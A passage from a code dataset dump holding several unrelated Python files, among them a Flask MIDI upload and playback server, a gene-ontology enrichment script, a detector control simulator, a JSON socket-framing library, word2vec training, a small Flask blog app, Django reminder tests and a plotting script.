False\n\n#Debug variables\nnot_existent = True\n\n#Help functions\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\ndef prevent_file_override_name(file):\n filename = file.filename\n file.save(os.path.join(app.config['TEMP_FOLDER'], filename))\n md5 = hashlib.md5()\n\n with open(os.path.join(app.config['TEMP_FOLDER'], filename), 'rb') as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n md5.update(chunk)\n os.remove(os.path.join(app.config['TEMP_FOLDER'], filename))\n return md5.hexdigest() + SEPERATOR + secure_filename(file.filename)\n\ndef get_uploaded_files():\n path = app.config['UPLOAD_FOLDER']\n files = []\n for file in os.listdir(path):\n if os.path.isfile(os.path.join(path, file)):\n files.append({'filename':file, 'name':file.split(SEPERATOR, 1)[1] \\\n .rsplit('.', 1)[0].replace('_', ' ')})\n return files\n\ndef play(midi):\n global plaing\n global stop\n\n plaing = True\n mido.set_backend('serial_output')\n\n print(\"Started playing: \", midi)\n\n with mido.open_output() as port:\n print('Using {}.'.format(port))\n\n for msg in mido.MidiFile(os.path.join(UPLOAD_FOLDER, midi)).play():\n if stop:\n break\n port.send(msg)\n\n\n#Server routes\n@app.route(\"/\")\ndef index():\n return redirect(url_for('cp_0'))\n\n@app.route(\"/cp\")\ndef cp_0():\n return render_template(\"index.html\", files=get_uploaded_files())\n\n@app.route(\"/cp/\")\ndef cp_1(upload):\n files = get_uploaded_files()\n return render_template(\"index.html\", upload=upload, files=files)\n\n@app.route(\"/upload\", methods=['GET', 'POST'])\ndef upload():\n if request.method == 'POST':\n #Isn't a file part in the post request?\n if 'file' not in request.files:\n flash('No file part!')\n return redirect(url_for('cp_1', upload='error'))\n file = request.files['file']\n\n #Is a file selected?\n if file.filename == '':\n flash('No file selected')\n return redirect(url_for('cp_1', upload='error'))\n\n #Is file allowed to be uploaded\n #Then save\n if file and allowed_file(file.filename):\n filename = prevent_file_override_name(file)\n file.stream.seek(0)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('cp_1', upload='succsess'))\n\n@app.route(\"/write\", methods=['POST'])\ndef write():\n global thread\n global plaing\n global stop\n if plaing:\n stop = True\n 
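# The previous track is still playing: raise the stop flag and wait for\n        # play() to notice it between MIDI messages and return, so only one\n        # playback thread writes to the serial port at a time.\n        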
thread.join()\n stop = False\n thread = Thread(target=play, args=(request.form['midi'],))\n thread.start()\n return redirect(url_for('cp_1', upload='playing'))\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"221117682","text":"## Script for analysing the gene enrichment of a set of differentially expressed genes.\n## Input: file with differentially expressed genes, file with identified genes in experiment\n##\t\t file with process category-terms for all genes in species. \n\n#Last edited: 09/01/2018\n\n#input paths\npath_category = \"../data/openMS/results/goterm.csv\"\npath_sign = \"../data/openMS/statistics/sign_genes.csv\"\npath_iden = \"../data/openMS/statistics/diffacto_q_values.csv\"\n\n#output path\npath_sign_out = \"../data/openMS/enrichment/new/sign_process.csv\"\npath_iden_out = \"../data/openMS/enrichment/new/identified_process.csv\"\npath_process = \"../data/openMS/enrichment/new/enriched_processes_new.csv\"\n\n\n\nimport pandas as pd\nfrom scipy import stats\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\n#import file with significantly expressed genes:\nsign_df = pd.read_csv(path_sign, header=0, index_col=0, usecols=[\"protein\",\"f_value\",\"p_value\",\"q_value\"])\ncg_df = pd.read_csv(path_category, header=0, index_col=0, usecols=[\"gene_id\",\"go_description\",\"go_id\"])\niden_df = pd.read_csv(path_iden, header=0, index_col=0, usecols=[\"protein\",\"f_value\",\"p_value\",\"q_value\"])\n\nprint(cg_df)\n\"\"\"\n###calc qvalue###\ndef get_q_value(pvals):\n\tq_sign = 0.05\n\tnum = len(pvals)\n\tq_vals = []\n\tsign = []\n\t##starting from the lowest ranked p-value:\n\tprev_q = pvals[-1]\n\tq_vals.append(prev_q)\n\tif prev_q < q_sign:\n\t\tsign.append(\"Yes\")\n\telse:\n\t\tsign.append(\"No\")\n\t##minimum for those with higher rank\n\tfor rank in range (num-1,0,-1):\n\t\tq_val = min(pvals[rank-1]*num/rank , prev_q)\n\t\tq_vals.append(q_val)\n\t\tprev_q = q_val\n\t\t##Find significant results\n\t\tif q_val < q_sign:\n\t\t\tsign.append(\"Yes\")\n\t\telse:\n\t\t\tsign.append(\"No\")\n\treturn q_vals[::-1], sign[::-1]\n\"\"\"\n\"\"\"\n##ignore\n#Make a dictonary of GO-terms:\ngo_d = dict()\ngoid_d = dict()\n\nfor protein,go in zip(cg_df.index.tolist(),cg_df[\"go_description\"]):\n\tif protein in go_d:\n\t\tgo_d[protein] = go_d[protein] + go\n\telse:\n\t\tgo_d[protein] = go\nprint(go_d)\n\"\"\"\n\n\n#new part for GO\nGO_counts = cg_df[\"go_id\"].value_counts()\nprint(GO_counts)\n\"\"\"\n###ANOVA: significant###\n#get counts for sign proteins\nprocess_list_sign = []\n#adding processes for each gene to dataframe\nfor index in sign_df.index.get_values():\t\t#index: proteinID\t\n\tprocess_list_sign.append(cg_df.loc[index][\"Process\"])\t#find process type\nsign_df = sign_df.assign(process = process_list_sign)\n#output df with processes\nsign_df.to_csv(path_sign_out)\n#counting number for each process\nprocess_counts = sign_df[\"process\"].value_counts()\nprocess_sign = process_counts.index.tolist()\ncounts_sign = process_counts.values.tolist()\n#add to dictionary with process counts\ncounts_df = pd.DataFrame(counts_sign,process_sign)\ncounts_df.index.names = [\"process\"]\ncounts_df.columns =[\"counts_significant\"]\ncounts_df = counts_df.assign(counts_identified=([0]*17))\n\"\"\"\n\n\n\"\"\"\n###Identified###\n#get counts for iden 
proteins\nprocess_list_iden = []\n##adding process to all genes\nfor index in iden_df.index.get_values():\t\t#index: proteinID\t\n\tprocess_list_iden.append(cg_df.loc[index][\"Process\"])\t#find process type\niden_df = iden_df.assign(process = process_list_iden)\n#output df with processes\niden_df.to_csv(path_iden_out)\n##counting number for each process\nprocess_counts = iden_df[\"process\"].value_counts()\nfor process,count in process_counts.items():\n\tcounts_df.ix[process][1]=count\n\t\n###Statistics: Hypergeometric test###\nN= len(sign_df)\t\t#total significant genes\nM = len(iden_df)\t#total identified genes\nx=counts_df[\"counts_significant\"]\t#process counts in significant\nn=counts_df[\"counts_identified\"]\t#process counts in identified\npvalsH = stats.hypergeom.sf(x-1, M, n, N, loc=0)\t#perform hypergeometric test\n\npvalsL = []\n\n#cdf wont accept my input as array/list/df. avoiding the struggle:\nfor xL,nL in zip(x,n):\n\tpvalL = stats.hypergeom.cdf(xL, M, nL, N, loc=0)\n\tpvalsL.append(pvalL)\n\ncounts_df = counts_df.assign(p_value_enrichment=pvalsH,p_value_depletion=pvalsL)\n\n\n#Sort according to p-value_depletion and add q-values\ncounts_df_pval = counts_df.sort_values(by=[\"p_value_depletion\"],ascending=True)\nqvalsL, signL = get_q_value(counts_df_pval[\"p_value_depletion\"])\ncounts_df_pval = counts_df_pval.assign(q_value_depletion=qvalsL)\ncounts_df_pval = counts_df_pval.assign(depletion_significant=signL)\n\n#sort according to p-value enrichment and add q-values\ncounts_df_pval = counts_df_pval.sort_values(by=[\"p_value_enrichment\"],ascending=True)\nqvalsH, signH = get_q_value(counts_df_pval[\"p_value_enrichment\"])\ncounts_df_pval = counts_df_pval.assign(q_value_enrichment=qvalsH)\ncounts_df_pval = counts_df_pval.assign(enrichment_significant=signH)\n\n#output process counts dataframe\t\ncounts_df_pval.to_csv(path_process)\n\n\n\n\n\n###Plots########################################################################################################\ncounts_df_sign = counts_df.sort_values(by=[\"counts_significant\"],ascending=True) #Sort according to #significant\nnum= len(counts_df)\nfig, ax = plt.subplots(figsize=(13,7))\nind = np.arange(num) # the x locations for the groups\nwidth = 0.3 # the width of the bars\nrects1 = ax.barh(ind, counts_df_sign[\"counts_identified\"], width, color='green')\nrects2 = ax.barh(ind + width, counts_df_sign[\"counts_significant\"], width, color='orange')\n\n# add some text for labels, title and axes ticks\nax.set_yticklabels(counts_df_sign.index)\nax.set_xlabel('Number of genes annotated')\nax.set_title('Enrichment of Categories')\nax.set_yticks(ind + width/2)\n\n#save plot\nax.legend((rects1[0], rects2[0]), ('Identified', 'ANOVA q<0.05'))\t\nplt.subplots_adjust(left=0.4)\nplt.savefig(\"../data/openMS/enrichment/new/enrichment_process_plot_new.png\")\nplt.close(fig)\n\n###normalized plot###\nnorm=[x/y for x, y in zip( counts_df_pval[\"counts_significant\"], counts_df_pval[\"counts_identified\"])]\ncounts_df_pval = counts_df_pval.assign(significant_normalized=norm)\ncounts_df_norm = counts_df_pval.sort_values(by=[\"significant_normalized\"],ascending=True) #sort according to norm-value\nfig, ax = plt.subplots(figsize=(10,6))\nrects = ax.barh(ind, counts_df_norm[\"significant_normalized\"], width, color='#335B8E')\nfor i, bar in enumerate(rects):\n\tif counts_df_norm['enrichment_significant'][i] == 'Yes':\n\t\t\tbar.set_color(\"#B7DBDB\")\n# Shrink current axis's height by 10% on the bottom\nbox = 
ax.get_position()\nax.set_position([box.x0, box.y0 + box.height * 0.1,\n box.width, box.height * 0.9])\n\n# Put a legend below current axis\n#ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05),\n# fancybox=True, shadow=True, ncol=2)\n\n# add some text for labels, title and axes ticks\nax.set_yticklabels(counts_df_norm.index)\nax.set_xlabel('Proportion of genes annotated')\nax.set_title('Normalised Enrichment of Categories')\nax.set_yticks(ind + width/2)\n\n#save plot\ncolour_blue = matplotlib.patches.Patch(color='#335B8E', label='Nonsignificant')\ncolour_yel = matplotlib.patches.Patch(color=\"#B7DBDB\", label='Significant enrichment')\n#plt.legend(handles=[colour_blue,colour_yel], loc=8)\nplt.legend(handles=[colour_blue,colour_yel], loc='upper center', bbox_to_anchor=(0.5, -0.1), ncol=2)\nplt.subplots_adjust(left=0.5, bottom=0.2)\nplt.savefig(\"../data/openMS/enrichment/new/enrichment_process_plot_new_norm.png\")\nplt.close(fig)\n\"\"\"\n\"\"\"\n###normalized plot###V2\nnorm=[x/M for x in (counts_df_pval[\"counts_identified\"])]\ncounts_df_pval = counts_df_pval.assign(significant_normalized=norm)\ncounts_df_norm = counts_df_pval.sort_values(by=[\"significant_normalized\"],ascending=True) #sort according to norm-value\nfig, ax = plt.subplots(figsize=(13,6))\nrects = ax.barh(ind, counts_df_norm[\"significant_normalized\"], width, color='blue')\nfor i, bar in enumerate(rects):\n\tif counts_df_norm['enrichment_significant'][i] == 'Yes':\n\t\t\tbar.set_color(\"#edd012\")\n\n# add some text for labels, title and axes ticks\nax.set_yticklabels(counts_df_norm.index)\nax.set_xlabel('Proportion of genes annotated')\nax.set_title('Normalised Enrichment of Categories')\nax.set_yticks(ind + width/2)\n\n#save plot\ncolour_blue = matplotlib.patches.Patch(color='blue', label='Nonsignificant')\ncolour_yel = matplotlib.patches.Patch(color=\"#edd012\", label='Significant enrichment')\nplt.legend(handles=[colour_blue,colour_yel])\nplt.subplots_adjust(left=0.4)\nplt.savefig(\"../data/openMS/enrichment/new/enrichment_process_plot_new_norm_V2.png\")\nplt.close(fig)\n\"\"\"","sub_path":"project/scripts/enrichment_analysis_script_checking_GO.py","file_name":"enrichment_analysis_script_checking_GO.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"315426926","text":"\"\"\"\nCreated on 20 May 2016\n\n@author: Alan Greer\n\"\"\"\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport time\nfrom latrd_channel import LATRDChannel\nfrom latrd_message import LATRDMessageException, LATRDMessage, GetMessage, PutMessage, PostMessage, ResponseMessage\nfrom latrd_reactor import LATRDReactor\n\n\nclass LATRDControlSimulator(object):\n DETECTOR_1M = 1\n DETECTOR_10M = 10\n\n def __init__(self, type=DETECTOR_1M):\n logging.basicConfig(format='%(asctime)-15s %(message)s')\n self._log = logging.getLogger(\".\".join([__name__, self.__class__.__name__]))\n self._log.setLevel(logging.DEBUG)\n self._ctrl_channel = None\n self._type = type\n self._reactor = LATRDReactor()\n self._store = {\n \"status\":\n {\n \"detector\":\n {\n \"state\": \"Idle\",\n \"description\": \"TRISTAN control interface\",\n \"serial_number\": \"0\",\n \"software_version\": \"0.0.1\",\n \"sensor_material\": \"Silicon\",\n \"sensor_thickness\": \"300 um\",\n \"x_pixel_size\": \"55 um\",\n \"y_pixel_size\": \"55 um\",\n \"x_pixels_in_detector\": 2048,\n \"y_pixels_in_detector\": 512,\n \"timeslice_number\": 4\n },\n 
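# Per-module housekeeping values: each list below holds one reading per FEM,\n                # so its length tracks the detector type (1 for 1M, 10 for 10M).\n                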
\"housekeeping\":\n {\n \"standby\": \"On\",\n \"fem_power_enabled\": [True] * self._type,\n \"psu_temp\": [28.6] * self._type,\n \"psu_temp_alert\": [False] * self._type,\n \"fan_alert\": [False] * self._type,\n \"output_alert\": [False] * self._type,\n \"current_sense\": [1.5] * self._type,\n \"voltage_sense\": [2.1] * self._type,\n \"remote_temp\": [30.1] * self._type,\n \"fan_control_temp\": [36.3] * self._type,\n \"tacho\": [0.8] * self._type,\n \"pwm\": [128] * self._type\n },\n \"clock\":\n {\n \"dpll_lol\": [True] * self._type,\n \"dpll_hold\": [True] * self._type,\n \"clock_freq\": [65.7] * self._type\n },\n \"sensor\":\n {\n \"temp\": [65.8] * self._type,\n \"humidity\": [47.8] * self._type\n },\n \"fem\":\n {\n \"temp\": [45.3] * self._type\n }\n },\n \"config\":\n {\n \"state\": \"Idle\",\n \"exposure_time\": 0.0,\n \"gap\": 0.0,\n \"repeat_interval\": 0.0,\n \"frames\": 0,\n \"frames_per_trigger\": 0,\n \"n_trigger\": 0,\n \"mode\": \"Time_Energy\",\n \"profile\": \"Standard\",\n \"threshold\": 5.2,\n \"timeslice\":\n {\n \"duration_rollover_bits\": 18\n },\n \"bias\":\n {\n \"voltage\": 0.0,\n \"enable\": False\n },\n \"time\": \"2018-09-26T09:30Z\"\n }\n }\n\n def setup_control_channel(self, endpoint):\n self._ctrl_channel = LATRDChannel(LATRDChannel.CHANNEL_TYPE_ROUTER)\n self._ctrl_channel.bind(endpoint)\n self._reactor.register_channel(self._ctrl_channel, self.handle_ctrl_msg)\n\n def start_reactor(self):\n self._log.debug(\"Starting reactor...\")\n self._reactor.run()\n\n def handle_ctrl_msg(self):\n id = self._ctrl_channel.recv()\n msg = LATRDMessage.parse_json(self._ctrl_channel.recv())\n\n self._log.debug(\"Received message ID[%s]: %s\", id, msg)\n if isinstance(msg, GetMessage):\n self._log.debug(\"Received GetMessage, parsing...\")\n self.parse_get_msg(msg, id)\n elif isinstance(msg, PutMessage):\n self._log.debug(\"Received PutMessage, parsing...\")\n self.parse_put_msg(msg)\n elif isinstance(msg, PostMessage):\n self._log.debug(\"Received PostMessage, parsing...\")\n self.parse_post_msg(msg)\n else:\n raise LATRDMessageException(\"Unknown message type received\")\n\n def parse_get_msg(self, msg, send_id):\n # Check the parameter keys and retrieve the values from the store\n values = {}\n self.read_parameters(self._store, msg.params, values)\n self._log.debug(\"Return value object: %s\", values)\n reply = ResponseMessage(msg.msg_id, values, ResponseMessage.RESPONSE_OK)\n self._ctrl_channel.send_multi([send_id, reply])\n\n def parse_put_msg(self, msg):\n # Retrieve the parameters and merge them with the store\n params = msg.params\n for key in params:\n self.apply_parameters(self._store, key, params[key])\n self._log.debug(\"Updated parameter Store: %s\", self._store)\n reply = ResponseMessage(msg.msg_id)\n self._ctrl_channel.send(reply)\n\n def parse_post_msg(self, msg):\n # Nothing to do here, just wait two seconds before replying\n time.sleep(2.0)\n # Check for the \"Run\" command. 
If it is sent and the simulated script has been supplied then execute it\n\n reply = ResponseMessage(msg.msg_id)\n self._ctrl_channel.send(reply)\n\n def apply_parameters(self, store, key, param):\n if key not in store:\n store[key] = param\n else:\n if isinstance(param, dict):\n for new_key in param:\n self.apply_parameters(store[key], new_key, param[new_key])\n else:\n store[key] = param\n\n def read_parameters(self, store, param, values):\n self._log.debug(\"Params: %s\", param)\n for key in param:\n if isinstance(param[key], dict):\n values[key] = {}\n self.read_parameters(store[key], param[key], values[key])\n else:\n values[key] = store[key]\n\n\ndef options():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--control\", default=\"tcp://127.0.0.1:7001\", help=\"Control endpoint\")\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = options()\n\n simulator = LATRDControlSimulator()\n simulator.setup_control_channel(args.control)\n simulator.start_reactor()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"control/latrd/detector/control_simulator.py","file_name":"control_simulator.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"26578639","text":"import io\nimport json\nimport struct\nimport sys\nimport socket\n\n\"\"\"\nA CHAS implementation of the Python Socket.\nThe CHAS socket handles all low-level read/write operations,\nAnd includes support for CHAS device objects.\n\"\"\"\n\n\nclass CHASocket:\n\n def __init__(self, selector, sock, addr, log):\n\n self.sel = selector # Selector object\n self.sock = sock # Socket object\n self.addr = addr # Address of client\n self._jsonheader_len = None # Length of JSON header\n self._jsonheader = None # Decoded JSON header\n self.content = None # Decoded content of the response\n self.__dev = None # UUID of device socket is binded to, allows for high level CHAS socket management\n\n self.log = log\n\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 32000)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32000)\n self.sock.settimeout(5)\n\n def _read(self, byts):\n\n # Read a specified amount of bytes\n\n data = b''\n orig = int(byts)\n\n while True:\n\n try:\n\n data = data + self.sock.recv(byts)\n\n except BlockingIOError:\n\n # Resource temporarily unavailable!\n\n self.log.info(\"Socket temporarily unavailable!\")\n\n finally:\n\n # Check how many bytes we have read - Prevents Socket Drift:\n\n byts = orig - len(data)\n\n if len(data) == orig:\n\n # We are done lets break:\n\n break\n\n return data\n\n def read(self):\n\n if self._jsonheader_len is None:\n\n self._process_proto_header()\n\n if self._jsonheader_len is not None:\n\n if self._jsonheader is None:\n\n self._process_jsonheader()\n\n if self._jsonheader:\n\n if self.content is None:\n\n return self._process_request()\n\n self._read(50)\n\n return None\n\n def _write(self, content_bytes):\n\n # Write data to the stream\n\n self.sock.sendall(content_bytes)\n\n return\n\n def write(self, content, encoding='utf-8'):\n\n # Encoding data and sending data\n\n encoded = self._json_encode(content)\n\n message = self._create_message(encoded, 'text', encoding)\n\n self._write(message)\n\n def _json_encode(self, mesg, encoding=\"utf-8\"):\n\n # Encode message in JSON\n\n return json.dumps(mesg, ensure_ascii=False).encode(encoding)\n\n def _json_decode(self, json_bytes, encoding=\"utf-8\"):\n\n # Decode message in JSON\n\n 
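# Wrap the raw bytes in a text stream so json.load can decode them in one pass.\n\n        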
try:\n\n tiow = io.TextIOWrapper(\n io.BytesIO(json_bytes), encoding=encoding, newline=\"\"\n )\n\n obj = json.load(tiow)\n tiow.close()\n\n return obj\n\n except Exception as e:\n\n self.log.error(\"Error while decoding: {}\".format(json_bytes))\n\n def _process_proto_header(self):\n\n # Method for processing proto header\n\n hdrlen = 2\n\n content = self._read(2)\n\n if len(content) == hdrlen:\n\n self._jsonheader_len = struct.unpack(\n \">H\", content\n )[0]\n\n return\n\n def _process_jsonheader(self):\n\n hdrlen = self._jsonheader_len\n\n content = self._read(hdrlen)\n\n if len(content) == hdrlen:\n\n self._jsonheader = self._json_decode(\n content, encoding=\"utf-8\"\n )\n\n for reqhd in (\n \"byteorder\",\n \"content-length\",\n \"content-type\",\n \"content-encoding\",\n ):\n\n if reqhd not in self._jsonheader:\n\n raise Exception(\"Malformed JSON Header!\")\n\n return\n\n def _process_request(self):\n\n # Method for processing the request\n\n content_len = self._jsonheader[\"content-length\"]\n\n contents = self._read(content_len)\n\n encoding = self._jsonheader[\"content-encoding\"]\n\n content = self._json_decode(contents, encoding=encoding)\n\n self._jsonheader = None\n self._jsonheader_len = None\n\n return content\n\n def _create_message(self, content_bytes, content_type, content_encoding):\n\n # Method for creating message:\n\n header = {\"byteorder\": sys.byteorder,\n \"content-type\": content_type,\n \"content-encoding\": content_encoding,\n \"content-length\": len(content_bytes)}\n\n header_bytes = self._json_encode(header)\n\n proto_header = struct.pack(\">H\", len(header_bytes))\n\n message = proto_header + header_bytes + content_bytes\n\n return message\n\n @property\n def device_uuid(self):\n \n return self.__dev\n\n def bind(self, uuid):\n\n # Binds a device UUID to the socket, ensures CHAS Socket security,\n # And allows for higher level CHAS socket operations.\n # This action is permanent for all CHAS socket instances.\n\n if self.__dev is not None:\n\n # Ignoring attempted binding attempt, already binded\n\n return\n\n self.__dev = uuid\n \n return\n\n def close(self):\n\n # Method for closing the websocket\n\n print(f\"Closing connection to: {self.addr}\")\n\n try:\n\n self.sel.unregister(self.sock)\n\n except Exception as e:\n\n print(f\"Error unregistering socket: {e}\")\n\n try:\n\n self.sock.close()\n\n except Exception as e:\n\n print(f\"Error closing socket: {e}\")\n\n finally:\n\n self.sock = None\n","sub_path":"chas/server/chaslib/socket_lib.py","file_name":"socket_lib.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"389652660","text":"import logging\nfrom gensim.models import word2vec\nimport re\n\n\ndef read_data(data_path):\n\twith open(data_path, \"r\") as f:\n\t\tsentences = []\n\t\tfor i, line in enumerate(f):\n\t\t\tsentences.append(line.strip().split())\n\treturn sentences\n\nif __name__ == \"__main__\":\n\tsentences = read_data(\"../data/IMDB.train.corpus\")\n\t\n\t#logging\n\tlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n \t\n\t#train word vectors\n\tmodel = word2vec.Word2Vec(sentences, size=32, min_count = 3, workers = 24, window = 10, sg = 0) # CBOW\n \n\t#store the 
model\n\tmodel.save('../models/word2vec.mod')\n\n","sub_path":"src/train_word2vec.py","file_name":"train_word2vec.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233360470","text":"from flask import render_template, redirect, url_for, request\nfrom main import db\nfrom main import app\nfrom models import BlogPost\n\n\n@app.route('/')\ndef all_posts():\n return render_template('log_post.html')\n\n@app.route('/posts/')\ndef show_post(id):\n post = BlogPost.query.get(id)\n return render_template('post.html', post=post)\n\n@app.route('/posts/new')\ndef new_post():\n return render_template('new_post.html')\n\n@app.route('/posts/del')\ndef del_post():\n #post = BlogPost.query.get(id)\n #db.session.delete(post)\n #db.session.commit()\n return render_template('del_post.html')\n\n\n@app.route('/posts/delete',methods=['POST'])\ndef delete_post():\n flag=0\n title=request.form.get('title',None)\n all_posts = BlogPost.query.all()\n for post in all_posts:\n if title==post.title:\n db.session.delete(post)\n db.session.commit() \n flag=1\n if flag:\n return render_template('del1_post.html')\n else:\n return render_template('nodelet_post.html') \n\n@app.route('/posts/search3')\ndef search3_post():\n return render_template('search2_post.html')\n\n@app.route('/posts/search',methods=['POST'])\ndef search1_post():\n title=request.form.get('title',None)\n all_posts = BlogPost.query.all()\n for post in all_posts:\n if title==post.title:\n return redirect(url_for('show_post' ,id=post.id))\n return render_template('error_post.html') \n \n \n@app.route('/edit/')\ndef edit_post(id):\n post = BlogPost.query.get(id)\n db.session.delete(post)\n db.session.commit()\n return redirect(url_for('new_post'))\n\n@app.route('/posts/register',methods=['POST'])\ndef login_post():\n title=request.form.get('title',None)\n content=request.form.get('content', None)\n all_posts=BlogPost.query.all()\n flag1=0\n flag2=0\n for post in all_posts:\n if title==post.title:\n flag1=1\n if content==post.content:\n flag2=1\n if flag1 and flag2: \n return render_template('register_yes.html')\n elif flag1:\n return render_template('log_post.html',error='the password is worry!!!')\n else :\n return render_template('log_post.html',error='the user is inexistence!!!')\n \n \n@app.route('/posts/add', methods=['POST'])\ndef add_post():\n title = request.form.get('title', None)\n content = request.form.get('content', None)\n if title and content:\n if len(str(title))==10 and len(str(content))==6:\n BlogPost.create(title, content)\n return redirect(url_for('all_posts'))\n return render_template('new_post.html', error='Username and Password are required')\n\n\n\n\n\n\n\n\n","sub_path":"flask-sample1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"364690544","text":"from datetime import timedelta\nimport io\nfrom unittest import mock\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core import management\nfrom django.test import TestCase, override_settings\nfrom django.utils import timezone\n\nfrom glitter.models import Version\nfrom glitter.pages.models import Page\nfrom glitter.reminders import choices\nfrom glitter.reminders.models import Reminder\n\n\n@override_settings(\n ROOT_URLCONF='glitter.reminders.tests.urls',\n)\nclass 
ReminderManagementTestCase(TestCase):\n\n def setUp(self):\n self.user = User.objects.create_user(\n username='joe', password='qwerty', email='test@gmail.com'\n )\n self.stdout = io.StringIO()\n self.stderr = io.StringIO()\n\n def tearDown(self):\n self.stdout.close()\n self.stderr.close()\n\n def create_page_with_version(self, modified):\n self.page = Page.objects.create(url='/test/', title='Test page')\n with mock.patch('django.db.models.fields.DateTimeField.pre_save') as mock_pre_save:\n mock_pre_save.return_value = modified\n self.page_version = Version.objects.create(\n content_type=ContentType.objects.get_for_model(Page),\n object_id=self.page.id,\n template_name='glitter/sample.html',\n owner=self.user\n )\n self.page_version.generate_version()\n self.page.current_version = self.page_version\n self.page.current_version.modified = mock.Mock(\n return_value=timezone.now() - timedelta(days=16)\n )\n self.page.save()\n\n def create_reminder(self, interval, page):\n self.reminder = Reminder.objects.create(\n interval=interval,\n content_type=ContentType.objects.get_for_model(Page),\n object_id=self.page.id,\n user=self.user\n )\n\n def test_send_reminder(self):\n \"\"\" Send reminder in two weeks interal. \"\"\"\n # More then two weeks ago.\n modified_at = timezone.now() - timedelta(days=16)\n\n self.create_page_with_version(modified=modified_at)\n self.create_reminder(\n interval=choices.INTERVAL_2_WEEKS, page=self.page\n )\n self.reminder.sent_at = modified_at\n self.reminder.save()\n\n management.call_command('send_reminders', stdout=self.stdout, verbosity=3)\n command_output = self.stdout.getvalue().strip()\n\n self.assertEqual(\n command_output,\n 'Email for {} is sent to: {}'.format(\n self.reminder.content_object, self.reminder.user.email\n )\n )\n\n def test_not_send_reminder_next_day(self):\n \"\"\"\n Should not sent reminder if content updated 16 days ago but reminder was sent 1 day ago\n based on 2 weeks interval.\n \"\"\"\n modified_at = timezone.now() - timedelta(days=16)\n\n self.create_page_with_version(modified=modified_at)\n self.create_reminder(\n choices.INTERVAL_2_WEEKS, self.page\n )\n self.reminder.sent_at = timezone.now() - timedelta(days=1)\n self.reminder.save()\n\n self.stdout = io.StringIO()\n\n management.call_command('send_reminders', stdout=self.stdout, verbosity=3)\n\n command_output = self.stdout.getvalue().strip()\n self.assertEqual(\n command_output,\n 'Email for {} is not sent to: {}'.format(\n self.reminder.content_object, self.reminder.user.email\n )\n )\n\n def test_reminder_sent_at(self):\n \"\"\"\n Test if sent_at set 100 days ago and the content was modified 3 days ago based on 2 weeks\n interval.\n \"\"\"\n modified_at = timezone.now() - timedelta(days=3)\n\n self.create_page_with_version(modified=modified_at)\n self.create_reminder(choices.INTERVAL_2_WEEKS, self.page)\n\n self.reminder.sent_at = timezone.now() - timedelta(days=100)\n self.reminder.save()\n\n self.stdout = io.StringIO()\n management.call_command('send_reminders', stdout=self.stdout, verbosity=3)\n command_output = self.stdout.getvalue().strip()\n self.assertEqual(\n command_output,\n 'Email for {} is not sent to: {}'.format(\n self.reminder.content_object, self.reminder.user.email\n )\n )\n","sub_path":"glitter/tests/reminders/test_management.py","file_name":"test_management.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"289426720","text":"import matplotlib.pyplot as plt\nimport 
numpy as np\nimport sys\nimport matplotlib as mpl\nfrom scipy import stats\n\nmpl.rcParams[\"errorbar.capsize\"] = 2\n\nBIGGER_SIZE = 18\nplt.rc('font', size=BIGGER_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=BIGGER_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=BIGGER_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=BIGGER_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=BIGGER_SIZE)\n\ndef barplot_files(fnames, xlabels, yaxis):\n\n xdef = np.arange(0, len(xlabels))\n orig = [np.loadtxt(f) for f in fnames]\n data = []\n\n # outlier removal (Tukey)\n for d in orig:\n # outlier removal (Tukey, 1.5 param)\n d_25 = np.quantile(d, 0.25)\n iqr = stats.iqr(d)\n d_75 = np.quantile(d, 0.75)\n lower = d_25 - 1.5*iqr\n upper = d_75 + 1.5*iqr\n cdata = np.array([x for x in d if x > lower and x < upper])\n data.append(cdata)\n\n bars = [np.mean(x) for x in data]\n stddevs = [np.std(x) for x in data]\n\n fig, ax = plt.subplots(1, figsize=(7,7))\n\n ax.bar(xdef, bars, yerr=stddevs, width=0.3, color='rebeccapurple', edgecolor='black', linewidth=0.5, alpha=0.7)\n\n ax.set(xticklabels=xlabels)\n plt.xticks(xdef, rotation=30)\n plt.ylabel(yaxis)\n plt.tight_layout()\n plt.yscale('log')\n \n plt.savefig(\"parallel-constructs.pdf\")\n\n\n\nexps = [\"c_pt_parfor\", \"c_omp_parfor\", \"julia_parallel_for\", 